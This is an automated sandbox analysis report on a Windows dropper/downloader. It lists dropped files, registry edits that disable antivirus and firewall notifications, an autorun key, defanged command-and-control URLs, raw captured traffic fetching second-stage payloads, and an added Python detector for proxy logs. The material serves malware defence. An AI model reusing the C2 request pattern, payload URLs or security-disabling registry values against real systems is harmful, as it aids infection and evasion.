Detections: Susp_Dropper (Kaspersky), Gen:Variant.Symmi.22722 (B) (Emsisoft), Gen:Variant.Symmi.22722 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Malware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 4840427168a9965e4dd57695f4eb5f34
SHA1: 0ef4dfd6895938be97f42886e003869bb777c5fd
SHA256: 8645d5705505416572d9393acca274f5d6332a3636621489d2f44ed92b290203
SSDeep: 12288:9qq56aNzthKz69e1NDxNlq99NcMWf8uqlTn8lZQTgqjFsHi0:9dppbKz6WNkLUeJ8lZQT5
Size: 847360 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: PCPerformer
Created at: 2014-04-16 00:27:00
Analyzed on: WindowsXP SP3 32-bit
Summary: Malware. Malware, short for malicious software, is any software used to disrupt computer operation, gather sensitive information, or gain access to private computer systems.
Dynamic Analysis
Payload
No specific payload has been identified by the automated analysis. Note, however, that the configuration returned for the method=all request (see Network Activity) names a "miner_forced" plugin, the win32plot2.exe binary delivered inside binaries_burst4.zip, and a list of IP:port endpoints, so the sample should be treated as a downloader for a remotely configured second stage rather than as a self-contained payload.
Process activity
The Malware creates the following process(es):
win32plot2.exe:1396
jrhwdmjgu925ubg.exe:1776
jrhwdmjgu925ubg.exe:3876
jrhwdmjgunjvubg.exe:2660
%original file name%.exe:1144
unzip.exe:3760
ckxjtyt.exe:1964
ckxjtyt.exe:2836
jrhwdmjgszdmubgkotiny.exe:2128
jrhwdmjgt1byubg.exe:2588
jrhwdmjgubkfubg.exe:3640
pogwoihcz.exe:3524
pogwoihcz.exe:2856
The Malware injects its code into the following process(es): No processes have been created.
Mutexes
The following mutexes were created/opened: No objects were found.
File activity
The process jrhwdmjgunjvubg.exe:2660 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\bzntcdorshxs\tst (10 bytes)
The process %original file name%.exe:1144 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\jrhwdmjgszdmubgkotiny.exe (3920 bytes)
%System%\bzntcdorshxs\tst (10 bytes)
The Malware deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\jrhwdmjgszdmubgkotiny.exe (0 bytes)
The process unzip.exe:3760 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\binaries_burst4\win32\win32plot2.exe (673 bytes)
%System%\binaries_burst4\win64\win64burst2.exe (673 bytes)
%System%\binaries_burst4\win32\win32burst2.exe (673 bytes)
%System%\binaries_burst4\win64\win64plot2.exe (673 bytes)
The process ckxjtyt.exe:1964 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\bzntcdorshxs\tst (10 bytes)
The process ckxjtyt.exe:2836 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\binaries_burst4.zip (10700 bytes)
%System%\bzntcdorshxs\run (10 bytes)
%System%\bzntcdorshxs\rng (44 bytes)
%System%\unzip.exe (7100 bytes)
%System%\bzntcdorshxs\cfg (494 bytes)
%System%\pogwoihcz.exe (5873 bytes)
%WinDir%\Temp\jrhwdmjgu925ubg.exe (35 bytes)
%System%\bzntcdorshxs\tst (10 bytes)
%WinDir%\Temp\jrhwdmjgt1byubg.exe (35 bytes)
%WinDir%\Temp\jrhwdmjgubkfubg.exe (2820 bytes)
%WinDir%\Temp\jrhwdmjgunjvubg.exe (5873 bytes)
The Malware deletes the following file(s):
%WinDir%\Temp\jrhwdmjgt1byubg.exe (0 bytes)
%WinDir%\Temp\jrhwdmjgubkfubg.exe (0 bytes)
%WinDir%\Temp\jrhwdmjgu925ubg.exe (0 bytes)
The process jrhwdmjgszdmubgkotiny.exe:2128 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\bzntcdorshxs\etc (10 bytes)
%System%\ckxjtyt.exe (5873 bytes)
%System%\drivers\etc\hosts (22 bytes)
%System%\bzntcdorshxs\tst (10 bytes)
The Malware deletes the following file(s):
%System%\drivers\etc\hosts (0 bytes)
The process pogwoihcz.exe:3524 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\bzntcdorshxs\tst (10 bytes)
The process pogwoihcz.exe:2856 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\bzntcdorshxs\tst (10 bytes)
Registry activity
The process win32plot2.exe:1396 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
The process jrhwdmjgu925ubg.exe:1776 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 9C E5 B6 99 02 49 CB AA D2 50 26 B3 C6 6D 3C"
The process jrhwdmjgu925ubg.exe:3876 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 52 33 C4 75 6A 43 E9 D7 74 60 B9 62 2B 23 A5"
The process jrhwdmjgunjvubg.exe:2660 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 B9 84 BF D5 1C C7 54 8E 5E 10 DE 9E 4E 24 BD"
The process unzip.exe:3760 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 E4 47 D5 42 0D 90 00 56 5C 12 74 E1 87 85 4D"
The process ckxjtyt.exe:2836 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 6C AC 11 85 8F BF D5 2A 15 20 D5 32 A8 01 49"
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
"FirewallDisableNotify" = "1"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
The process jrhwdmjgszdmubgkotiny.exe:2128 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "16 73 E8 5C DA 03 01 7E 41 DC 1A E3 19 87 2B 55"
To run automatically each time Windows boots, the Malware adds a link to its dropped file under the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AutoConnect Engine WebClient Web Procedure Trap" = "%System%\ckxjtyt.exe"
The process jrhwdmjgt1byubg.exe:2588 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C 8A 05 E4 23 AA 61 68 83 D8 98 CE C4 59 87 C7"
The process jrhwdmjgubkfubg.exe:3640 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"
Dropped PE files
MD5 | File path |
---|---|
476f447617f65eebf35c52d4fd3b3188 | c:\WINDOWS\Temp\jrhwdmjgu925ubg.exe |
fecf803f7d84d4cfa81277298574d6e6 | c:\WINDOWS\system32\unzip.exe |
HOSTS file anomalies
No changes have been detected by the automated check. Note that the file-activity section above records the process jrhwdmjgszdmubgkotiny.exe:2128 writing %System%\drivers\etc\hosts (22 bytes) and then deleting it, so the hosts file on an infected machine should still be inspected by hand.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
win32plot2.exe:1396
jrhwdmjgu925ubg.exe:1776
jrhwdmjgu925ubg.exe:3876
jrhwdmjgunjvubg.exe:2660
%original file name%.exe:1144
unzip.exe:3760
ckxjtyt.exe:1964
ckxjtyt.exe:2836
jrhwdmjgszdmubgkotiny.exe:2128
jrhwdmjgt1byubg.exe:2588
jrhwdmjgubkfubg.exe:3640
pogwoihcz.exe:3524
pogwoihcz.exe:2856
- Delete the original Malware file.
- Delete or disinfect the following files created/modified by the Malware:
%System%\bzntcdorshxs\tst (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jrhwdmjgszdmubgkotiny.exe (3920 bytes)
%System%\binaries_burst4\win32\win32plot2.exe (673 bytes)
%System%\binaries_burst4\win64\win64burst2.exe (673 bytes)
%System%\binaries_burst4\win32\win32burst2.exe (673 bytes)
%System%\binaries_burst4\win64\win64plot2.exe (673 bytes)
%System%\binaries_burst4.zip (10700 bytes)
%System%\bzntcdorshxs\run (10 bytes)
%System%\bzntcdorshxs\rng (44 bytes)
%System%\unzip.exe (7100 bytes)
%System%\bzntcdorshxs\cfg (494 bytes)
%System%\pogwoihcz.exe (5873 bytes)
%WinDir%\Temp\jrhwdmjgu925ubg.exe (35 bytes)
%WinDir%\Temp\jrhwdmjgt1byubg.exe (35 bytes)
%WinDir%\Temp\jrhwdmjgubkfubg.exe (2820 bytes)
%WinDir%\Temp\jrhwdmjgunjvubg.exe (5873 bytes)
%System%\bzntcdorshxs\etc (10 bytes)
%System%\ckxjtyt.exe (5873 bytes)
%System%\drivers\etc\hosts (22 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AutoConnect Engine WebClient Web Procedure Trap" = "%System%\ckxjtyt.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 667158 | 667648 | 4.71459 | 0d37ea21d46fd457efcdcbc414af23e6 |
.rdata | 671744 | 53434 | 53760 | 3.65008 | ebfa7ac2aa75c0bd35892129695abd28 |
.data | 729088 | 158844 | 124928 | 5.50119 | 16d3baf792c669359cc24b48d18a27cd |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://melbourneit.hotkeysparking.com/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 | |
hxxp://requireneither.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 | 208.91.197.241 |
hxxp://decemberknew.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 | 98.139.135.198 |
hxxp://decemberknew.net/forum/search.php?method=all&flag&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://www.geobytes.com/IpLocator.htm | 69.16.219.22 |
hxxp://decemberknew.net/forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU E5620 @ 2.40GHz (2400 MHz)&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=8083&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://decemberknew.net/forum/search.php?method=setvar&key=connected&value=8083&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=8083&slots=0&spm=0&adm=1&x64=0&mr=0 | 98.139.135.198 |
hxxp://decemberknew.net/dep/unzip.exe | 98.139.135.198 |
hxxp://decemberknew.net/dep/binaries_burst4.zip | 98.139.135.198 |
hxxp://throughcountry.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 | 208.91.197.241 |
hxxp://gentlefriend.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 | 208.91.197.241 |
hxxp://picturebecome.net/dep/binaries_burst4.zip | 98.139.135.198 |
hxxp://rememberpaint.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 | 208.91.197.241 |
hxxp://mightglossary.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 | 8.5.1.16 |
hxxp://picturebecome.net/dep/unzip.exe | 98.139.135.198 |
hxxp://glasshealth.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 | 208.91.197.241 |
www.showmyip.com | 212.117.175.194 |
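The URL table above shows the same check-in request (/forum/search.php with mode=sox, v=028 and a fixed sox identifier) being retried across a rotating set of two-word .net domains, with method=setvar requests reporting host details and the /dep/ paths fetching the second stage. The script below is an added example, not part of the Lavasoft report, that turns this pattern into a proxy-log check: it flags any /forum/search.php request carrying mode=sox regardless of the domain, decodes the method, sox, rsid and key/value parameters so an analyst can see what was reported, and separately flags fetches of the two /dep/ payload paths. The "timestamp client verb url" log layout and the sample lines are constructed for the example; URLs containing literal spaces, such as the cpuinfo report, need a log format that quotes the URL field.

```python
"""Detect the sandbox-observed check-in pattern in HTTP proxy logs.

Added example, not part of the Lavasoft report. The log layout below
("timestamp client verb url", whitespace separated) is a constructed
squid-like format; adapt parse_line() to your own proxy/IDS export.
"""
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (not from the report's pcap). The first three
# reuse URLs listed under Network Activity; the last two are benign noise.
SAMPLE_LOG = """\
1425663490 10.0.0.5 GET http://rememberpaint.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01
1425663543 10.0.0.5 GET http://decemberknew.net/forum/search.php?method=setvar&key=connected&value=8083&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=8083&slots=0&spm=0&adm=1&x64=0&mr=0
1425663545 10.0.0.5 GET http://picturebecome.net/dep/binaries_burst4.zip
1425663600 10.0.0.7 GET http://example.org/forum/search.php?q=sox
1425663601 10.0.0.7 GET http://example.org/dep/readme.txt
"""

# Second-stage payload paths observed in the report.
DEP_PAYLOADS = {"/dep/unzip.exe", "/dep/binaries_burst4.zip"}


def classify_url(url: str):
    """Return a finding dict for a matching URL, or None for anything else."""
    parts = urlsplit(url)
    q = parse_qs(parts.query, keep_blank_values=True)
    # Check-in: the path alone is generic; mode=sox is what makes it specific.
    if parts.path == "/forum/search.php" and q.get("mode") == ["sox"]:
        first = lambda k: q.get(k, [""])[0]
        return {
            "host": parts.hostname,
            "kind": "checkin",
            "method": first("method"),   # validate / all / setvar
            "sox": first("sox"),         # per-build identifier
            "v": first("v"),             # client version
            "rsid": first("rsid"),       # relay id assigned by the C2
            "key": first("key"),         # setvar: reported attribute
            "value": first("value"),     # setvar: reported value
        }
    # Second stage: the payload paths are fixed even though the host rotates.
    if parts.path in DEP_PAYLOADS:
        return {"host": parts.hostname, "kind": "payload", "path": parts.path}
    return None


def parse_line(line: str):
    """Split a constructed 'timestamp client verb url' line; None if malformed."""
    fields = line.split(maxsplit=3)
    if len(fields) != 4:
        return None
    ts, client, verb, url = fields
    return int(ts), client, verb, url


def scan_log(text: str):
    """Return one finding per matching log line, with client and time attached."""
    findings = []
    for line in text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, client, _verb, url = parsed
        hit = classify_url(url)
        if hit:
            hit["client"] = client
            hit["ts"] = ts
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Matching on the query parameters rather than on the domain list is deliberate: the report already shows eight different domains answering the same request, and the configuration response lists seventeen more fallbacks, so a domain blocklist alone will lag behind the operator.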
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: rememberpaint.net
HTTP/1.1 200 OK
Date: Fri, 06 Mar 2015 17:38:25 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2607
Keep-Alive: timeout=5, max=126
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://rememberpaint.net/?fp=1DRuJgDNJXkEVD5%2FiGni9v3toTy0wy2ebXlOhRNOtS5Udxlo0ID4PfPk5WN9s2E3tmehVOgDmzNCPKCXAdTI%2BQ==&prvtof=0G4hRm1xnmN71Auaziei4xYFwShH7oid2z0uKbb7hLo=&poru=JAEITCvT3ATSD95YCokaigCHAqcD57pq+k9Ssvb0G8WAxKobtn7HH3tsEsDhrrE1c9awH7YyTzET3nczMf6YUm/o067AT7oDEfv6njBn/HKsugTFg7xvoMY3V/nJNwQf&cifr=1&method=validate&mode=sox&v=028&sox=3b93ce01";.../*..-->..<script type="text/javascript">...<!--...dimensionUpdated = 0;...function applyFrameKiller()...{....if(window.top != self)....{.....cHeight = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//Non-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;.....} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {.....//IE 6 in 'standards compliant mode'.....cHeight = document.documentElement.clientHeight;.....dimensionUpdated = 1;.....} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {.....//IE 4 compatible.....cHeight = document.body.clientHeight;.....dimensionUpdated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1).....{......window.top.location = "hXXp://rememberpaint.net/?fp=1DRuJgDNJXkEVD5/iGni9v3toTy0wy2ebXlOhRNOtS5Udxlo0ID4PfPk5WN9s2E3tmehVOgDmzNCPKCXAdTI+Q==&prvtof=IT1nchMsaM0WXpFNgClhp0C+LPKdVwt2V3XT7a%2BsH1A=&poru=k4WuWLM/Nm3RxM1tSPdirQmbJGlibMJcKTIY8iBqlXnLr7dZfDXjfNzlDhmJd2PPlSK2W7FCLoHuF8GGSuzFF31sq8y0t92TOXSAtdSLEqfH6J1f4j11GEMW
<<< skipped >>>
GET /forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU E5620 @ 2.40GHz (2400 MHz)&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=8083&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: decemberknew.net
HTTP/1.0 200 OK
Date: Fri, 06 Mar 2015 17:39:04 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: ATS/5.0.1
.............
GET /forum/search.php?method=setvar&key=connected&value=8083&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=8083&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: decemberknew.net
HTTP/1.0 200 OK
Date: Fri, 06 Mar 2015 17:39:05 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: ATS/5.0.1
.............
GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: decemberknew.net
HTTP/1.0 200 OK
Date: Fri, 06 Mar 2015 17:39:03 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: ATS/5.0.1
304....U......(.decemberknew.net..........5......o..fFi..8.....b..&.).h.7..i..ng?H..........f..Ht.BH..<M..$.L..l..Z0........W*....... >@..;BY..hs ....f..,..uO@...*.N....J.........\.P.p_..OXP....&.t.Z.w....`..I=!n....W..~W..T.b..!..#._..lD.*...`.K..O......l.....Y...[.%..>/...W..9..?.X...=....B..?..b. .......4...053..............g..p.........!;..#....(.p..K3.;.Z......:-..D...........)......K$xy&.:b:ge......V.ACV.LC...X?&...#..|#)h.v=..6...N..Z.Lvz...,r-.?o.......W.:.h.....X..A..DB8.z. ...r ....(B...S.} ..S..aZ.>.."...V.....d...J.....*p..H /.R].....8<........]}....!.vf,.=...0h..b.o.<.D..{.....-y....N.......Z..I.Cd..K.Q.@..Tr.._-.Nr...}R...d....i...Vb..*..=.......1......n.M.o....?{.(..*.......L.3.../Y.....t...["0.....z....G.Z...I6....o..~..........u.a).k.. #u..,k.j0t..ah.JLsg..h...........}|.N..5`..O.<.(.".;.k.q...b..X..g.0...>...f...Nl.N.jU|.n...f...Js..0{p3..3.%..NlZp..>.*.p(...{I.~.APTnE.!.r4...3 ..]K.Y?....G-...*..K5L....n]...W...p..'&...._.iE[./L..1.b.:.!..*i..C)....L...IJ&k..#O.......p...;...(b..0/...T.lm(9.I....\\\..$_......E....k'...!..B....C..........Bc...{....Q?./OJ.jRd..{....j.`..].W...t...2....../5%......#[.g..WT.M}.9..y...t...GFF.!:.TA.o.*..X.<.`.]...._.....9..,4UQ..-...tA.N*"..P.....l......(N6<~..r...<T[_V(.-..J.M....&v..
<<< skipped >>>
GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: gentlefriend.net
HTTP/1.1 200 OK
Date: Fri, 06 Mar 2015 17:38:10 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2599
Keep-Alive: timeout=5, max=123
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://gentlefriend.net/?fp=3nB+Gww8ttmsWXm0BY1EdeTmO3Ulz67JmvcOUDVf4eYrovlWueybau49NakK4xLYrEVUQbqJcKdH0CbuvXfg5g==&prvtof=zhRgz1xuFRpHFAgLQv0feYD/DBX/Ng1JO565gWSBtZI=&poru=N8dRHeffnczSYRX4s7t//tDxbrorndTL1Hfxni3GMu9SpXTX7COifFNjVMvoIw4JEkRMkseCQXQwNz+8QJdhKj05mguiYHfqhLUf4gHPRqAn5eRP5v5DJ9GOnHJH/IEo&cifr=1&method=validate&mode=sox&v=028&sox=3b93ce01";.../*..-->..<script type="text/javascript">...<!--...dimensionUpdated = 0;...function applyFrameKiller()...{....if(window.top != self)....{.....cHeight = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//Non-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;.....} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {.....//IE 6 in 'standards compliant mode'.....cHeight = document.documentElement.clientHeight;.....dimensionUpdated = 1;.....} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {.....//IE 4 compatible.....cHeight = document.body.clientHeight;.....dimensionUpdated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1).....{......window.top.location = "hXXp://gentlefriend.net/?fp=3nB+Gww8ttmsWXm0BY1EdeTmO3Ulz67JmvcOUDVf4eYrovlWueybau49NakK4xLYrEVUQbqJcKdH0CbuvXfg5g==&prvtof=XtjO2X71dZ5T2BDPJWLoPT7k8Mx5PXGAeq+J3jPNgxU=&poru=h2VspZVYRcX61rDfjpvXg4PszgFGhY31jvEvToI6myr+/qWzpARQ4n%2By1Rdv0gzizQizReBV4w5LK2vhGfE840xM/AjnZx7n5lEVhUfW2/InmjHAedL0
<<< skipped >>>
GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: requireneither.net
HTTP/1.1 200 OK
Date: Fri, 06 Mar 2015 17:38:10 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2601
Keep-Alive: timeout=5, max=111
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://requireneither.net/?fp=axCPzesR7uBwtTqOnmcl9F6GeD2ZopDbYpEVkJd07DDm0lAUyJuIxlLRzzCEJlVCjx6s55CadqZFeRomVEAErQ==&prvtof=DtovJQCpYRpf99MUWzBwaQI1fo6mS7UMSgVgFRORcFY=&poru=J1gFiuzz+h8I6C8md3nr6FsCHGohqf81OdafFArL0i+6O4BDZQB/pReR4mHRPRCqKx%2F7vBiRKyRlbQQLuJArpae1V3+ZgdHNLZLXnd1iVcCyXACaJj1xabfHGLFvaMdn&cifr=1&method=validate&mode=sox&v=028&sox=3b93ce01";.../*..-->..<script type="text/javascript">...<!--...dimensionUpdated = 0;...function applyFrameKiller()...{....if(window.top != self)....{.....cHeight = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//Non-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;.....} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {.....//IE 6 in 'standards compliant mode'.....cHeight = document.documentElement.clientHeight;.....dimensionUpdated = 1;.....} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {.....//IE 4 compatible.....cHeight = document.body.clientHeight;.....dimensionUpdated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1).....{......window.top.location = "hXXp://requireneither.net/?fp=axCPzesR7uBwtTqOnmcl9F6GeD2ZopDbYpEVkJd07DDm0lAUyJuIxlLRzzCEJlVCjx6s55CadqZFeRomVEAErQ==&prvtof=cIgUFdj0K5P8mVSR9AkhcEl2A4Gj/iGY9C53s3q4RCI%3D&poru=xZkbqYo/emU/zwMkcAtPW1mOH0T7Sx4x3sXsGyevMKJglGwvtrb99Xv7WbO3UfbrO8u/YApPSNIVR6oacHv69g+9JRMagR37GsZAjICaculwljRRugrFlsR5
<<< skipped >>>
relayrqst
ID
..
GET /dep/unzip.exe HTTP/1.0
Accept: */*
Connection: close
Host: picturebecome.net
HTTP/1.0 200 OK
Date: Fri, 06 Mar 2015 17:39:05 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 20 May 2014 22:57:37 GMT
Accept-Ranges: bytes
Content-Length: 164864
Content-Type: application/octet-stream
Age: 0
Server: ATS/5.0.1
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......B...............8.Z...................p....@...............3........................... ......................................................................................................................................................text...$X.......Z..................`..`.data........p.......^..............@....bss.....................................idata...............`..............@....rsrc................t..............@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.......$........C..h.....1.]...U.......$........C..H.....1.]...U......U...$..d.C...]..v...'....U......U...$..H.C...]..v...'....U..S..$..$..@..}O.......C....$.pB.....B..M..E......L$..T$..U..T$..D$..pB...K....qB...t^..qB...<.C...t..D$..Z...$..K....<.C....t....qB..\$..J0..$..K....<.C....t....qB..\$..JP..$.{K...fK.....qB.....C...4K.....pB......pB...$.\$..L$..........J....$..N....&....U......]..M.1..u.1.....=..........=....sg=....t....u..]...]....D$.......$......J.....t"..t...$......&......'...........
<<< skipped >>>
GET /dep/binaries_burst4.zip HTTP/1.0
Accept: */*
Connection: close
Host: picturebecome.net
HTTP/1.0 200 OK
Date: Fri, 06 Mar 2015 17:39:06 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 06 Mar 2015 17:25:24 GMT
Accept-Ranges: bytes
Content-Length: 321783
Content-Type: application/zip
Age: 0
Server: ATS/5.0.1
PK..........fF................binaries_burst4/..1 ...~2...PK..............PK..........fF................binaries_burst4/win64/..1 ...~2...PK..............PK........p.fFTn..JD......$...binaries_burst4/win64/win64plot2.exe..1 ...~2...Z../....?|].ex.z#a.k.}o}.#<\_..2%....(..~.....n`.|b.....M..w..v...;...5......;...f6!..^r.TRTu ...S4..F.#.h!J...z.....@..@.-y.7..)..D..C.}......8..-$..-.wy..{'....Wh.....e~hK....Wu.9odo.G...O......f...e{.....|A....c......Q..6.i*...dJ$.3.o.8....,.....#_.........lg.p..p*h.D-..%9?.Gf...........8...?..=c.l'..1.K...C.V.......B..I{.....aG..55O{.$!..,...........Y~..............X.00Jxc.................z.%.(:M...R.....7......1..v~j.......`,@...wj.....)..J....4..T...%D....z.....w.AP*!.....{....a.NE=.h.....C.......!..wC....R..lQX.L.G....o4......'.t7QYOE.x{..y&..{....?y.....@F.3......Y-.L.MV.-..=.....J}.KHK.lG..(........P ..=.a...>.p!DR..u.. 